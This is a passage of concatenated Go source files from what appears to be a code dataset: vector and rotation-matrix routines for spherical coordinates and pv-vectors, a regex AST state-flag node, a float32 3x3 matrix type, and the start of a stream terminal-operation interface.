	p  [3]float64  p-vector

Returned:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)

Notes:

 1. The vector p can have any magnitude; only its direction is used.
 2. If p is null, zero theta and phi are returned.
 3. At either pole, zero theta is returned.
*/
func C2s(p [3]float64, theta *float64, phi *float64) {
	x, y, z := p[0], p[1], p[2]
	d2 := x*x + y*y
	*theta = 0.0
	if d2 != 0.0 {
		*theta = atan2(y, x)
	}
	*phi = 0.0
	if z != 0.0 {
		*phi = atan2(z, sqrt(d2))
	}
}

/*
S2p Convert spherical polar coordinates to p-vector.

Given:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)
	r      float64  radial distance

Returned:

	p  [3]float64  Cartesian coordinates

Called:

	S2c  spherical coordinates to unit vector
	Sxp  multiply p-vector by scalar
*/
func S2p(theta, phi, r float64, p *[3]float64) {
	var u [3]float64
	S2c(theta, phi, &u)
	Sxp(r, u, p)
}

/*
P2s P-vector to spherical polar coordinates.

Given:

	p  [3]float64  p-vector

Returned:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)
	r      float64  radial distance

Notes:

 1. If P is null, zero theta, phi and r are returned.
 2. At either pole, zero theta is returned.

Called:

	C2s  p-vector to spherical
	Pm   modulus of p-vector
*/
func P2s(p [3]float64, theta *float64, phi *float64, r *float64) {
	C2s(p, theta, phi)
	*r = Pm(p)
}
// Operations involving pv-vectors (2)
/*
S2pv Convert position/velocity from spherical to Cartesian coordinates.

Given:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)
	r      float64  radial distance
	td     float64  rate of change of theta
	pd     float64  rate of change of phi
	rd     float64  rate of change of r

Returned:

	pv  [2][3]float64  pv-vector
*/
func S2pv(theta, phi, r float64, td, pd, rd float64, pv *[2][3]float64) {
	st, ct := sin(theta), cos(theta)
	sp, cp := sin(phi), cos(phi)
	rcp := r * cp
	x, y := rcp*ct, rcp*st
	rpd := r * pd
	w := rpd*sp - cp*rd
	// Position.
	pv[0] = [3]float64{x, y, r * sp}
	// Velocity (time derivative of the position expression).
	pv[1] = [3]float64{-y*td - w*ct, x*td - w*st, rpd*cp + sp*rd}
}
/*
Pv2s Convert position/velocity from Cartesian to spherical coordinates.

Given:

	pv  [2][3]float64  pv-vector

Returned:

	theta  float64  longitude angle (radians)
	phi    float64  latitude angle (radians)
	r      float64  radial distance
	td     float64  rate of change of theta
	pd     float64  rate of change of phi
	rd     float64  rate of change of r

Notes:

 1. If the position part of pv is null, theta, phi, td and pd
    are indeterminate.  This is handled by extrapolating the
    position through unit time by using the velocity part of
    pv.  This moves the origin without changing the direction
    of the velocity component.  If the position and velocity
    components of pv are both null, zeroes are returned for all
    six results.

 2. If the position is a pole, theta, td and pd are indeterminate.
    In such cases zeroes are returned for all three.
*/
func Pv2s(pv [2][3]float64, theta, phi, r *float64, td, pd, rd *float64) {
	var x, y, z, xd, yd, zd, rxy2, rxy, r2, rtrue, rw, xyp float64

	/* Components of position/velocity vector. */
	x = pv[0][0]
	y = pv[0][1]
	z = pv[0][2]
	xd = pv[1][0]
	yd = pv[1][1]
	zd = pv[1][2]

	/* Component of r in XY plane squared. */
	rxy2 = x*x + y*y

	/* Modulus squared. */
	r2 = rxy2 + z*z

	/* Modulus. */
	rtrue = sqrt(r2)

	/* If null vector, move the origin along the direction of movement
	   (see note 1: position is replaced by the velocity so the angular
	   quantities stay well defined). */
	rw = rtrue
	if rtrue == 0.0 {
		x = xd
		y = yd
		z = zd
		rxy2 = x*x + y*y
		r2 = rxy2 + z*z
		rw = sqrt(r2)
	}

	/* Position and velocity in spherical coordinates. */
	rxy = sqrt(rxy2)
	xyp = x*xd + y*yd
	if rxy2 != 0.0 {
		*theta = atan2(y, x)
		*phi = atan2(z, rxy)
		*td = (x*yd - y*xd) / rxy2
		*pd = (zd*rxy2 - z*xyp) / (r2 * rxy)
	} else {
		/* On the z axis (pole): theta and its rates are indeterminate,
		   return zeroes (see note 2). */
		*theta = 0.0
		if z != 0.0 {
			*phi = atan2(z, rxy)
		} else {
			*phi = 0.0
		}
		*td = 0.0
		*pd = 0.0
	}
	/* r is the true modulus even when the origin was moved. */
	*r = rtrue
	if rw != 0.0 {
		*rd = (xyp + z*zd) / rw
	} else {
		*rd = 0.0
	}
}
// 5. Operations on Vectors (17)
// Operations involving p-vectors and r-matrices (8)
/*
Ppp P-vector addition.

Given:

	a  [3]float64  first p-vector
	b  [3]float64  second p-vector

Returned:

	apb  [3]float64  a + b

Note:

	It is permissible to re-use the same array for any of the
	arguments.
*/
func Ppp(a, b [3]float64, apb *[3]float64) {
	for i := range apb {
		apb[i] = a[i] + b[i]
	}
}

/*
Pmp P-vector subtraction.

Given:

	a  [3]float64  first p-vector
	b  [3]float64  second p-vector

Returned:

	amb  [3]float64  a - b

Note:

	It is permissible to re-use the same array for any of the
	arguments.
*/
func Pmp(a, b [3]float64, amb *[3]float64) {
	for i := range amb {
		amb[i] = a[i] - b[i]
	}
}
/*
Ppsp P-vector plus scaled p-vector.

Given:

	a  [3]float64  first p-vector
	s  float64     scalar (multiplier for b)
	b  [3]float64  second p-vector

Returned:

	apsb  [3]float64  a + s*b

Note:

	It is permissible for any of a, b and apsb to be the same array.
*/
func Ppsp(a [3]float64, s float64, b [3]float64, apsb *[3]float64) {
	// Computed component-wise in one pass (equivalent to Sxp + Ppp).
	for i := range apsb {
		apsb[i] = a[i] + s*b[i]
	}
}
/*
Pdp p-vector inner (=scalar=dot) product.

Given:

	a  [3]float64  first p-vector
	b  [3]float64  second p-vector

Returned (function value):

	float64  a . b
*/
func Pdp(a, b [3]float64) float64 {
	return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]
}

/*
Pxp p-vector outer (=vector=cross) product.

Given:

	a  [3]float64  first p-vector
	b  [3]float64  second p-vector

Returned:

	axb  [3]float64  a x b

Note:

	It is permissible to re-use the same array for any of the
	arguments.
*/
func Pxp(a, b [3]float64, axb *[3]float64) {
	// Build the result first so axb may alias a or b.
	*axb = [3]float64{
		a[1]*b[2] - a[2]*b[1],
		a[2]*b[0] - a[0]*b[2],
		a[0]*b[1] - a[1]*b[0],
	}
}
/*
Pm Modulus of p-vector.

Given:

	p  [3]float64  p-vector

Returned (function value):

	float64  modulus
*/
func Pm(p [3]float64) float64 {
	var sum float64
	for _, v := range p {
		sum += v * v
	}
	return sqrt(sum)
}
/*
Pn Convert a p-vector into modulus and unit vector.

Given:

	p  [3]float64  p-vector

Returned:

	r  float64     modulus
	u  [3]float64  unit vector

Notes:

 1. If p is null, the result is null.  Otherwise the result is a unit
    vector.

 2. It is permissible to re-use the same array for any of the
    arguments.

Called:

	Pm   modulus of p-vector
	Zp   zero p-vector
	Sxp  multiply p-vector by scalar
*/
func Pn(p [3]float64, r *float64, u *[3]float64) {
	m := Pm(p)
	*r = m
	// A null vector stays null; otherwise scale to unit length.
	if m == 0.0 {
		Zp(u)
		return
	}
	Sxp(1.0/m, p, u)
}
/*
Sxp Multiply a p-vector by a scalar.

Given:

	s  float64     scalar
	p  [3]float64  p-vector

Returned:

	sp  [3]float64  s * p

Note:

	It is permissible for p and sp to be the same array.
*/
func Sxp(s float64, p [3]float64, sp *[3]float64) {
	for i := range sp {
		sp[i] = s * p[i]
	}
}
// Operations involving pv-vectors (9)
/*
Pvppv Add one pv-vector to another.

Given:

	a  [2][3]float64  first pv-vector
	b  [2][3]float64  second pv-vector

Returned:

	apb  [2][3]float64  a + b

Note:

	It is permissible to re-use the same array for any of the
	arguments.
*/
func Pvppv(a, b [2][3]float64, apb *[2][3]float64) {
	for i := range apb {
		for j := range apb[i] {
			apb[i][j] = a[i][j] + b[i][j]
		}
	}
}

/*
Pvmpv Subtract one pv-vector from another.

Given:

	a  [2][3]float64  first pv-vector
	b  [2][3]float64  second pv-vector

Returned:

	amb  [2][3]float64  a - b

Note:

	It is permissible to re-use the same array for any of the
	arguments.
*/
func Pvmpv(a, b [2][3]float64, amb *[2][3]float64) {
	for i := range amb {
		for j := range amb[i] {
			amb[i][j] = a[i][j] - b[i][j]
		}
	}
}
/*
Pvdpv Inner (=scalar=dot) product of two pv-vectors.

Given:

	a  [2][3]float64  first pv-vector
	b  [2][3]float64  second pv-vector

Returned:

	adb  [2]float64  a . b (see note)

Note:

	If the position and velocity components of the two pv-vectors are
	( ap, av ) and ( bp, bv ), the result, a . b, is the pair of
	numbers ( ap . bp , ap . bv + av . bp ).  The two numbers are the
	dot-product of the two p-vectors and its derivative.
*/
func Pvdpv(a, b [2][3]float64, adb *[2]float64) {
	dot := func(x, y [3]float64) float64 {
		return x[0]*y[0] + x[1]*y[1] + x[2]*y[2]
	}
	// Constant part: ap . bp.
	adb[0] = dot(a[0], b[0])
	// Derivative part: ap . bv + av . bp.
	adb[1] = dot(a[0], b[1]) + dot(a[1], b[0])
}
/*
Pvxpv Outer (=vector=cross) product of two pv-vectors.

Given:

	a  [2][3]float64  first pv-vector
	b  [2][3]float64  second pv-vector

Returned:

	axb  [2][3]float64  a x b

Notes:

 1. If the position and velocity components of the two pv-vectors are
    ( ap, av ) and ( bp, bv ), the result, a x b, is the pair of
    vectors ( ap x bp, ap x bv + av x bp ).  The two vectors are the
    cross-product of the two p-vectors and its derivative.

 2. It is permissible to re-use the same array for any of the
    arguments.
*/
func Pvxpv(a, b [2][3]float64, axb *[2][3]float64) {
	cross := func(x, y [3]float64) [3]float64 {
		return [3]float64{
			x[1]*y[2] - x[2]*y[1],
			x[2]*y[0] - x[0]*y[2],
			x[0]*y[1] - x[1]*y[0],
		}
	}
	// a and b are passed by value, so axb may safely alias either.
	d1 := cross(a[0], b[1])
	d2 := cross(a[1], b[0])
	axb[0] = cross(a[0], b[0])
	for i := range axb[1] {
		axb[1][i] = d1[i] + d2[i]
	}
}
/*
Pvm Modulus of pv-vector.

Given:

	pv  [2][3]float64  pv-vector

Returned:

	r  float64  modulus of position component (distance)
	s  float64  modulus of velocity component (speed)

Called:

	Pm  modulus of p-vector
*/
func Pvm(pv [2][3]float64, r, s *float64) {
	*r = Pm(pv[0]) // distance
	*s = Pm(pv[1]) // speed
}
/*
Sxpv Multiply a pv-vector by a scalar.
Given:
s float64 scalar
pv [2][3]float64 pv-vector
Returned:
spv [2][3]float64 s * pv
Note:
It is permissible for pv and spv to be the same array.
Called:
S2xpv multiply pv-vector by two scalars
*/
func Sxpv(s float64, pv [2][3]float64, spv *[2][3]float64) {
	/* Scale position and velocity components by the same factor. */
	S2xpv(s, s, pv, spv)
}
/*
S2xpv Multiply a pv-vector by two scalars.
Given:
s1 float64 scalar to multiply position component by
s2 float64 scalar to multiply velocity component by
pv [2][3]float64 pv-vector
Returned:
spv [2][3]float64 pv-vector: p scaled by s1, v scaled by s2
Note:
It is permissible for pv and spv to be the same array.
Called:
Sxp multiply p-vector by scalar
*/
func S2xpv(s1, s2 float64, pv [2][3]float64, spv *[2][3]float64) {
	/* Scale the position component by s1. */
	Sxp(s1, pv[0], &spv[0])
	/* Scale the velocity component by s2. */
	Sxp(s2, pv[1], &spv[1])
}
/*
Pvu Update a pv-vector.
Given:
dt float64 time interval
pv [2][3]float64 pv-vector
Returned:
upv [2][3]float64 p updated, v unchanged
Notes:
1) "Update" means "refer the position component of the vector
to a new date dt time units from the existing date".
2) The time units of dt must match those of the velocity.
3) It is permissible for pv and upv to be the same array.
Called:
Ppsp p-vector plus scaled p-vector
Cp copy p-vector
*/
func Pvu(dt float64, pv [2][3]float64, upv *[2][3]float64) {
	/* Position advanced by dt times the velocity. */
	Ppsp(pv[0], dt, pv[1], &upv[0])
	/* Velocity carried over unchanged. */
	Cp(pv[1], &upv[1])
}
/*
Pvup Update a pv-vector, discarding the velocity component.
Status: vector/matrix support function.
Given:
dt float64 time interval
pv [2][3]float64 pv-vector
Returned:
p [3]float64 p-vector
Notes:
1) "Update" means "refer the position component of the vector to a
new date dt time units from the existing date".
2) The time units of dt must match those of the velocity.
*/
func Pvup(dt float64, pv [2][3]float64, p *[3]float64) {
	/* Advance each position coordinate by dt times its velocity. */
	for i := 0; i < 3; i++ {
		p[i] = pv[0][i] + dt*pv[1][i]
	}
}
// 6. Operations on matrices (2)
/*
Rxr Multiply two r-matrices.
Given:
a [3][3]float64 first r-matrix
b [3][3]float64 second r-matrix
Returned:
atb [3][3]float64 a * b
Note:
It is permissible to re-use the same array for any of the
arguments.
*/
func Rxr(a, b [3][3]float64, atb *[3][3]float64) {
	/* Accumulate the product in a work matrix so that atb may alias a or b. */
	var wm [3][3]float64
	for i := 0; i < 3; i++ {
		for j := 0; j < 3; j++ {
			w := 0.0
			for k := 0; k < 3; k++ {
				w += a[i][k] * b[k][j]
			}
			wm[i][j] = w
		}
	}
	/* Arrays are values in Go: plain assignment copies the whole result. */
	*atb = wm
}
/*
Tr Transpose an r-matrix.
Given:
r [3][3]float64 r-matrix
Returned:
rt [3][3]float64 transpose
Note:
It is permissible for r and rt to be the same array.
*/
func Tr(r [3][3]float64, rt *[3][3]float64) {
	/* Build the transpose in a work matrix so that rt may alias r. */
	var wm [3][3]float64
	for i := 0; i < 3; i++ {
		for j := 0; j < 3; j++ {
			wm[i][j] = r[j][i]
		}
	}
	/* Arrays are values in Go: plain assignment copies the whole result. */
	*rt = wm
}
// 7. Matrix-vector products (4)
// Operations involving p-vectors and r-matrices (2)
/*
Rxp Multiply a p-vector by an r-matrix.
Given:
r [3][3]float64 r-matrix
p [3]float64 p-vector
Returned:
rp [3]float64 r * p
Note:
It is permissible for p and rp to be the same array.
*/
func Rxp(r [3][3]float64, p [3]float64, rp *[3]float64) {
	/* Accumulate r * p in a work vector so that rp may alias p. */
	var wrp [3]float64
	for j := 0; j < 3; j++ {
		w := 0.0
		for i := 0; i < 3; i++ {
			w += r[j][i] * p[i]
		}
		wrp[j] = w
	}
	/* Arrays are values in Go: plain assignment copies the whole result. */
	*rp = wrp
}
/*
Trxp Multiply a p-vector by the transpose of an r-matrix.
Given:
r [3][3]float64 r-matrix
p [3]float64 p-vector
Returned:
trp [3]float64 r^T * p
Note:
It is permissible for p and trp to be the same array.
Called:
Tr transpose r-matrix
Rxp product of r-matrix and p-vector
*/
func Trxp(r [3][3]float64, p [3]float64, trp *[3]float64) {
	/* Form the transpose of r, then apply it to p. */
	var rt [3][3]float64
	Tr(r, &rt)
	Rxp(rt, p, trp)
}
// Operations involving pv-vectors (2)
/*
Rxpv Multiply a pv-vector by an r-matrix.
Given:
r [3][3]float64 r-matrix
pv [2][3]float64 pv-vector
Returned:
rpv [2][3]float64 r * pv
Notes:
1) The algorithm is for the simple case where the r-matrix r is not
a function of time. The case where r is a function of time leads
to an additional velocity component equal to the product of the
derivative of r and the position vector.
2) It is permissible for pv and rpv to be the same array.
Called:
Rxp product of r-matrix and p-vector
*/
func Rxpv(r [3][3]float64, pv [2][3]float64, rpv *[2][3]float64) {
	/* Rotate the position and velocity components independently. */
	Rxp(r, pv[0], &rpv[0])
	Rxp(r, pv[1], &rpv[1])
}
/*
Trxpv Multiply a pv-vector by the transpose of an r-matrix.
Given:
r [3][3]float64 r-matrix
pv [2][3]float64 pv-vector
Returned:
trpv [2][3]float64 r^T * pv
Notes:
1) The algorithm is for the simple case where the r-matrix r is not
a function of time. The case where r is a function of time leads
to an additional velocity component equal to the product of the
derivative of the transpose of r and the position vector.
2) It is permissible for pv and trpv to be the same array.
Called:
Tr transpose r-matrix
Rxpv product of r-matrix and pv-vector
*/
func Trxpv(r [3][3]float64, pv [2][3]float64, trpv *[2][3]float64) {
	/* Transpose of matrix r (for a proper rotation matrix this is its inverse). */
	var tr [3][3]float64
	Tr(r, &tr)
	/* Matrix tr * vector pv -> vector trpv. */
	Rxpv(tr, pv, trpv)
}
// 9. Rotation vectors (2)
/*
Rv2m Form the r-matrix corresponding to a given r-vector.
Given:
w [3]float64 rotation vector (Note 1)
Returned:
r [3][3]float64 rotation matrix
Notes:
1) A rotation matrix describes a rotation through some angle about
some arbitrary axis called the Euler axis. The "rotation vector"
supplied to this function has the same direction as the Euler
axis, and its magnitude is the angle in radians.
2) If w is null, the identity matrix is returned.
3) The reference frame rotates clockwise as seen looking along the
rotation vector from the origin.
*/
func Rv2m(w [3]float64, r *[3][3]float64) {
	var x, y, z, phi, s, c, f float64
	/* Euler angle (magnitude of rotation vector) and functions. */
	x = w[0]
	y = w[1]
	z = w[2]
	phi = sqrt(x*x + y*y + z*z)
	s = sin(phi)
	c = cos(phi)
	f = 1.0 - c
	/* Euler axis (direction of rotation vector), perhaps null. */
	/* When phi is zero x, y, z stay zero and, with s = 0, f = 0, c = 1,
	   the matrix below reduces to the identity. */
	if phi > 0.0 {
		x /= phi
		y /= phi
		z /= phi
	}
	/* Form the rotation matrix (Rodrigues-style expansion; the signs
	   follow the frame-rotation convention described above). */
	r[0][0] = x*x*f + c
	r[0][1] = x*y*f + z*s
	r[0][2] = x*z*f - y*s
	r[1][0] = y*x*f - z*s
	r[1][1] = y*y*f + c
	r[1][2] = y*z*f + x*s
	r[2][0] = z*x*f + y*s
	r[2][1] = z*y*f - x*s
	r[2][2] = z*z*f + c
}
/*
Rm2v Express an r-matrix as an r-vector.
Given:
r [3][3]float64 rotation matrix
Returned:
w [3]float64 rotation vector (Note 1)
Notes:
1) A rotation matrix describes a rotation through some angle about
some arbitrary axis called the Euler axis. The "rotation vector"
returned by this function has the same direction as the Euler axis,
and its magnitude is the angle in radians. (The magnitude and
direction can be separated by means of the function Pn.)
2) If r is null, so is the result. If r is not a rotation matrix
the result is undefined; r must be proper (i.e. have a positive
determinant) and real orthogonal (inverse = transpose).
3) The reference frame rotates clockwise as seen looking along
the rotation vector from the origin.
*/
func Rm2v(r [3][3]float64, w *[3]float64) {
	var x, y, z, s2, c2, phi, f float64
	/* Axis direction scaled by 2*sin(phi): differences of off-diagonal pairs. */
	x = r[1][2] - r[2][1]
	y = r[2][0] - r[0][2]
	z = r[0][1] - r[1][0]
	s2 = sqrt(x*x + y*y + z*z)
	if s2 > 0 {
		/* trace(r) - 1 = 2*cos(phi). */
		c2 = r[0][0] + r[1][1] + r[2][2] - 1.0
		phi = atan2(s2, c2)
		/* Rescale (x,y,z) to have magnitude phi. */
		f = phi / s2
		w[0] = x * f
		w[1] = y * f
		w[2] = z * f
	} else {
		/* Null rotation vector.
		   NOTE(review): a rotation of exactly pi also makes s2 == 0 (the
		   off-diagonal differences vanish) and falls into this branch —
		   confirm this matches the reference SOFA/ERFA behavior. */
		w[0] = 0.0
		w[1] = 0.0
		w[2] = 0.0
	}
}
} | vml.go | 0.722037 | 0.612136 | vml.go | starcoder |
package ast
import (
"github.com/lyraproj/goni/goni/state"
"github.com/lyraproj/goni/util"
)
// stateNode is an AST node that carries a bit set of state flags.
type stateNode struct {
	abstractNode
	state state.Type // bit set of state flags (see the state package)
}
// AppendTo writes a human-readable dump of the state flags to w.
func (s *stateNode) AppendTo(w *util.Indenter) {
	w.NewLine()
	w.Append(`state: `)
	s.state.AppendString(w)
}
// StateType returns the node's current state flag bits.
func (s *stateNode) StateType() state.Type {
	return s.state
}
// setFlag turns the given flag bits on in the node's state.
func (s *stateNode) setFlag(bits state.Type) { s.state |= bits }

// clearFlag turns the given flag bits off in the node's state.
func (s *stateNode) clearFlag(bits state.Type) { s.state &= ^bits }

// The exported methods below toggle individual state flags. They are kept
// one-per-flag to preserve the existing public API.

func (s *stateNode) SetMinFixed() { s.setFlag(state.MinFixed) }

func (s *stateNode) ClearMinFixed() { s.clearFlag(state.MinFixed) }

func (s *stateNode) SetMaxFixed() { s.setFlag(state.MaxFixed) }

func (s *stateNode) ClearMaxFixed() { s.clearFlag(state.MaxFixed) }

func (s *stateNode) SetCLenFixed() { s.setFlag(state.CLenFixed) }

func (s *stateNode) ClearCLenFixed() { s.clearFlag(state.CLenFixed) }

func (s *stateNode) SetMark1() { s.setFlag(state.Mark1) }

func (s *stateNode) ClearMark1() { s.clearFlag(state.Mark1) }

func (s *stateNode) SetMark2() { s.setFlag(state.Mark2) }

func (s *stateNode) ClearMark2() { s.clearFlag(state.Mark2) }

func (s *stateNode) SetMemBackRefed() { s.setFlag(state.MemBackRefed) }

func (s *stateNode) ClearMemBackRefed() { s.clearFlag(state.MemBackRefed) }

func (s *stateNode) SetStopBtSimpleRepeat() { s.setFlag(state.StopBtSimpleRepeat) }

func (s *stateNode) ClearStopBtSimpleRepeat() { s.clearFlag(state.StopBtSimpleRepeat) }

func (s *stateNode) SetRecursion() { s.setFlag(state.Recursion) }

func (s *stateNode) ClearRecursion() { s.clearFlag(state.Recursion) }

func (s *stateNode) SetCalled() { s.setFlag(state.Called) }

func (s *stateNode) ClearCalled() { s.clearFlag(state.Called) }

func (s *stateNode) SetAddrFixed() { s.setFlag(state.AddrFixed) }

func (s *stateNode) ClearAddrFixed() { s.clearFlag(state.AddrFixed) }

func (s *stateNode) SetNamedGroup() { s.setFlag(state.NamedGroup) }

func (s *stateNode) ClearNamedGroup() { s.clearFlag(state.NamedGroup) }

func (s *stateNode) SetNameRef() { s.setFlag(state.NameRef) }

func (s *stateNode) ClearNameRef() { s.clearFlag(state.NameRef) }

func (s *stateNode) SetInRepeat() { s.setFlag(state.InRepeat) }

func (s *stateNode) ClearInRepeat() { s.clearFlag(state.InRepeat) }

func (s *stateNode) SetNestLevel() { s.setFlag(state.NestLevel) }

func (s *stateNode) ClearNestLevel() { s.clearFlag(state.NestLevel) }

func (s *stateNode) SetByNumber() { s.setFlag(state.ByNumber) }
func (s *stateNode) ClearByNumber() {
s.state &= ^state.ByNumber
} | ast/statenode.go | 0.576542 | 0.458046 | statenode.go | starcoder |
package math3d32
import "fmt"
// Matrix3 is a 3x3 matrix of float32 stored in column-major (OpenGL) order.
type Matrix3 []float32

// MakeMatrix3V builds a Matrix3 from the first nine values in v. When
// rowMajor is true the values are transposed into the column-major
// (OpenGL) storage order; otherwise they are copied as-is.
func MakeMatrix3V(v []float32, rowMajor bool) Matrix3 {
	if rowMajor {
		// Transpose the data into the OpenGL (column-major) layout.
		return Matrix3{v[0], v[3], v[6], v[1], v[4], v[7], v[2], v[5], v[8]}
	}
	return Matrix3{v[0], v[1], v[2], v[3], v[4], v[5], v[6], v[7], v[8]}
}

// MakeMatrix3 returns a new zero matrix.
func MakeMatrix3() Matrix3 {
	return make(Matrix3, 9)
}

// Copy returns an independent copy of m.
func (m Matrix3) Copy() Matrix3 {
	return Matrix3{m[0], m[1], m[2], m[3], m[4], m[5], m[6], m[7], m[8]}
}
// MakeZero sets all nine elements of m to zero in place and returns m.
func (m Matrix3) MakeZero() Matrix3 {
	for i := 0; i < 9; i++ {
		m[i] = 0
	}
	return m
}

// MakeIdentity overwrites m with the 3x3 identity matrix in place and
// returns m.
func (m Matrix3) MakeIdentity() Matrix3 {
	for i := 0; i < 9; i++ {
		m[i] = 0
	}
	m[0], m[4], m[8] = 1, 1, 1
	return m
}
// Determinant returns det(m), computed by cofactor expansion (the storage
// order does not matter because det(A) == det(A^T)).
func (m Matrix3) Determinant() float32 {
	return m[0]*(m[4]*m[8]-m[5]*m[7]) - m[1]*(m[3]*m[8]-m[5]*m[6]) + m[2]*(m[3]*m[7]-m[4]*m[6])
}
// MulS returns a new matrix with every element of m multiplied by scalar.
func (m Matrix3) MulS(scalar float32) Matrix3 {
	return Matrix3{
		m[0] * scalar, m[1] * scalar, m[2] * scalar,
		m[3] * scalar, m[4] * scalar, m[5] * scalar,
		m[6] * scalar, m[7] * scalar, m[8] * scalar,
	}
}
// Inverse returns the inverse of m as a new matrix, computed as the
// adjugate scaled by 1/det(m).
// NOTE(review): there is no singularity check — if det(m) == 0 the result
// contains Inf/NaN values.
func (m Matrix3) Inverse() Matrix3 {
	r := MakeMatrix3()
	// Reciprocal of the determinant.
	d := 1.0 / m.Determinant()
	r[0] = d * (m[4]*m[8] - m[5]*m[7])
	r[1] = -d * (m[1]*m[8] - m[2]*m[7])
	r[2] = d * (m[1]*m[5] - m[2]*m[4])
	r[3] = -d * (m[3]*m[8] - m[5]*m[6])
	r[4] = d * (m[0]*m[8] - m[2]*m[6])
	r[5] = -d * (m[0]*m[5] - m[2]*m[3])
	r[6] = d * (m[3]*m[7] - m[4]*m[6])
	r[7] = -d * (m[0]*m[7] - m[1]*m[6])
	r[8] = d * (m[0]*m[4] - m[1]*m[3])
	return r
}
// Cofactor returns the matrix of cofactors (signed 2x2 minors) of m as a
// new matrix. Note: Inverse equals the transpose of this matrix scaled by
// 1/det(m).
func (m Matrix3) Cofactor() Matrix3 {
	r := MakeMatrix3()
	r[0] = (m[4]*m[8] - m[5]*m[7])
	r[1] = -(m[3]*m[8] - m[5]*m[6])
	r[2] = (m[3]*m[7] - m[4]*m[6])
	r[3] = -(m[1]*m[8] - m[2]*m[7])
	r[4] = (m[0]*m[8] - m[2]*m[6])
	r[5] = -(m[0]*m[7] - m[1]*m[6])
	r[6] = (m[1]*m[5] - m[2]*m[4])
	r[7] = -(m[0]*m[5] - m[2]*m[3])
	r[8] = (m[0]*m[4] - m[1]*m[3])
	return r
}
// Equal reports whether every element of m matches the corresponding
// element of q.
func (m Matrix3) Equal(q Matrix3) bool {
	for i := 0; i < 9; i++ {
		if m[i] != q[i] {
			return false
		}
	}
	return true
}

// NotEqual reports whether any element of m differs from the corresponding
// element of q.
func (m Matrix3) NotEqual(q Matrix3) bool {
	for i := 0; i < 9; i++ {
		if m[i] != q[i] {
			return true
		}
	}
	return false
}
// Multiply this matrix with a column vector v, resulting in another column
// vector. Result component i is the dot product of (m[3i], m[3i+1], m[3i+2])
// with v.
func (m Matrix3) MultiplyV(v Vector3) Vector3 {
	return Vector3{m[0]*v[0] + m[1]*v[1] + m[2]*v[2],
		m[3]*v[0] + m[4]*v[1] + m[5]*v[2],
		m[6]*v[0] + m[7]*v[1] + m[8]*v[2]}
}
// MultiplyM returns the matrix product of m and q as a new matrix.
// NOTE(review): given the column-major storage, verify against callers
// whether this computes m*q or q*m in mathematical terms.
func (m Matrix3) MultiplyM(q Matrix3) Matrix3 {
	r := MakeMatrix3()
	r[0] = q[0]*m[0] + q[1]*m[3] + q[2]*m[6]
	r[1] = q[0]*m[1] + q[1]*m[4] + q[2]*m[7]
	r[2] = q[0]*m[2] + q[1]*m[5] + q[2]*m[8]
	r[3] = q[3]*m[0] + q[4]*m[3] + q[5]*m[6]
	r[4] = q[3]*m[1] + q[4]*m[4] + q[5]*m[7]
	r[5] = q[3]*m[2] + q[4]*m[5] + q[5]*m[8]
	r[6] = q[6]*m[0] + q[7]*m[3] + q[8]*m[6]
	r[7] = q[6]*m[1] + q[7]*m[4] + q[8]*m[7]
	r[8] = q[6]*m[2] + q[7]*m[5] + q[8]*m[8]
	return r
}
// Transposed returns the transpose of m as a new matrix; m is not modified.
func (m Matrix3) Transposed() Matrix3 {
	return Matrix3{m[0], m[3], m[6], m[1], m[4], m[7], m[2], m[5], m[8]}
}

// Transpose transposes m in place (by swapping the three off-diagonal
// pairs) and returns m.
func (m Matrix3) Transpose() Matrix3 {
	m[1], m[3] = m[3], m[1]
	m[2], m[6] = m[6], m[2]
	m[5], m[7] = m[7], m[5]
	return m
}
/*
// Orthogonalize will modify this matrix
func (m Matrix3) Orthogonalize(){
i := MakeVector3(m[0],m[1],m[2])
j := MakeVector3(m[3],m[4],m[5])
k := MakeVector3(m[6],m[7],m[8]).Normalize();
i = j.Cross(k).Normalize()
j=k.Cross(i);
m[0]=i[0]; m[3]=j[0]; m[6]=k[0]
m[1]=i[3]; m[4]=j[3]; m[7]=k[3]
m[2]=i[6]; m[5]=j[6]; m[8]=k[6]
}
func (m1 Matrix3) Orthogonalized() Matrix3{
m := m1.Copy()
m.Orthogonalize();
return m;
}
*/
/*
Tests to see if the difference between two matrices,
element-wise, exceeds ε. Returns true only when every
element-wise absolute difference is at most ε.
*/
func (a Matrix3) ApproxEquals(b Matrix3, ε float32) bool {
	for i := 0; i < 9; i++ {
		if Fabsf(a[i]-b[i]) > ε {
			return false
		}
	}
	return true
}
func (m Matrix3) String() string {
	// output in octave format for easy testing; elements are printed row by
	// row, so indices m[0], m[3], m[6] form the first printed row of the
	// column-major storage.
	return fmt.Sprintf("[%.5f,%.5f,%.5f;%.5f,%.5f,%.5f;%.5f,%.5f,%.5f]", m[0], m[3], m[6], m[1], m[4], m[7], m[2], m[5], m[8])
}
} | math3d32/matrix3.go | 0.751375 | 0.530662 | matrix3.go | starcoder |
package terminal
import (
"context"
"github.com/searKing/golang/go/error/exception"
"github.com/searKing/golang/go/util/class"
"github.com/searKing/golang/go/util/optional"
"github.com/searKing/golang/go/util/spliterator"
)
/**
* An operation in a stream pipeline that takes a stream as input and produces
* a result or side-effect. A {@code Op} has an input type and stream
* shape, and a result type. A {@code Op} also has a set of
* <em>operation flags</em> that describes how the operation processes elements
* of the stream (such as short-circuiting or respecting encounter order; see
* {@link StreamOpFlag}).
*
* <p>A {@code Op} must provide a sequential and parallel implementation
* of the operation relative to a given stream source and set of intermediate
* operations.
*
* @param <E_IN> the type of input elements
* @param <R> the type of the result
* @since 1.8
*/
type Operation interface {
	/**
	 * Gets the stream flags of the operation. Terminal operations may set a
	 * limited subset of the stream flags defined in {@link StreamOpFlag}, and
	 * these flags are combined with the previously combined stream and
	 * intermediate operation flags for the pipeline.
	 *
	 * @implSpec The default implementation returns zero.
	 *
	 * @return the stream flags for this operation
	 * @see StreamOpFlag
	 */
	GetOpFlags() int
	/**
	 * Performs a parallel evaluation of the operation on the elements
	 * produced by the given spliterator.
	 *
	 * @implSpec The default implementation (see TODOOperation) falls back
	 * to a sequential evaluation.
	 *
	 * @param ctx the context governing the evaluation
	 * @param spliterator the source spliterator
	 * @return the result of the evaluation
	 */
	EvaluateParallel(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional
	/**
